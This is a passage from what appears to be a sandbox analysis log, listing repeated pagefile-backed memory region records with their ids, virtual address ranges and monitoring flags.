"pagefile_0x00000000072a0000" filename = "" Region: id = 10180 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10181 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10182 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10183 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10184 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10185 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10186 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10187 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10188 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10189 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10190 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10191 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10192 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10193 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10194 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10195 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10196 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10197 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10198 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10199 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10200 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10201 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10202 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10203 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10204 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10205 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10206 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10207 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10208 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10209 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10210 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10211 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10212 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10213 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10214 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10215 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10216 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10217 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10218 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10219 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10220 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10221 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10222 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10223 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10224 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10225 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10226 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10227 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10228 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10229 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10230 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10231 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10232 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10233 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10234 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10235 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10236 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10237 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10238 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10239 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10240 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10241 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10242 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10243 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10244 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10245 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10246 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10247 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10248 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10249 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10250 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10251 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10252 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10253 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10254 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10255 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10256 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10257 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10258 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10259 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10260 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10261 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10262 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10263 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10264 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10265 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10266 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10267 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10268 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10269 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10270 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10271 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10272 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10273 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10274 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10275 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10276 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10277 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10278 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10279 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10280 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10281 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10282 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10283 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10284 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10285 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10286 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10287 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10288 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10289 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10290 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10291 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10292 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10293 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10294 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10295 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10296 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10297 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10298 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10299 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10300 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10301 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10302 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10303 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10304 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10305 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10306 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10307 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10308 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10309 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10310 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10311 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10312 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10313 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10314 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10315 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10316 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10317 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10318 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10319 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10320 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10321 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10322 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10323 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10324 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10325 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10326 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10327 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10328 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10329 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10330 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10331 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10332 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10333 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10334 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10335 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10336 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10337 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10338 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10339 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10340 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10341 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10342 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10343 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10344 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10345 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10346 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10347 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10348 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10349 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10350 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10351 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10352 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10353 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10354 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10355 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10356 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10357 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10358 